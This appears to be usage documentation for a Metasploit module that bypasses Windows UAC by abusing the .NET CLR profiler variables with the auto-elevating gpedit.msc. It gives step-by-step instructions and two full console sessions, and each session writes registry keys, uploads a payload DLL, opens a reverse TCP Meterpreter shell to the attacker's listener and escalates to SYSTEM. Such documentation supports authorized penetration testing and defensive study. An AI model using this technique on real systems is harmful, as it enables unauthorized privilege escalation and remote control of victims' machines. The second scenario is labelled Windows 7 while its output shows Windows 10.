## Introduction

Microsoft Windows allows for the automatic loading of a profiling COM object during
the launch of a CLR process based on certain environment variables ostensibly to
monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
that will be launched as the profiling thread.  This thread will run at the permission
level of the calling process, so an auto-elevating process will launch the DLL with
elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
process, but others would work, too.

## Usage

1. Create a session on the target system under the context of a local administrative user.
2. Begin interacting with the module: `use exploit/windows/local/bypassuac_dotnet_profiler`.
3. Set the `PAYLOAD` and configure it correctly.
4. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
5. Make sure that the `SESSION` value is set to the existing session identifier.
6. Invoke the module: `run`.

## Scenarios

### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64

```
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a
[*] Writing  to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.187
[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600
[*] Removing Registry Changes
[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : WIN7X64-SP1
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

```

### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
```
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler 
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6
session => 6
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options

Module options (exploit/windows/local/bypassuac_dotnet_profiler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       6                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600
[*] Removing Registry Changes
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

```
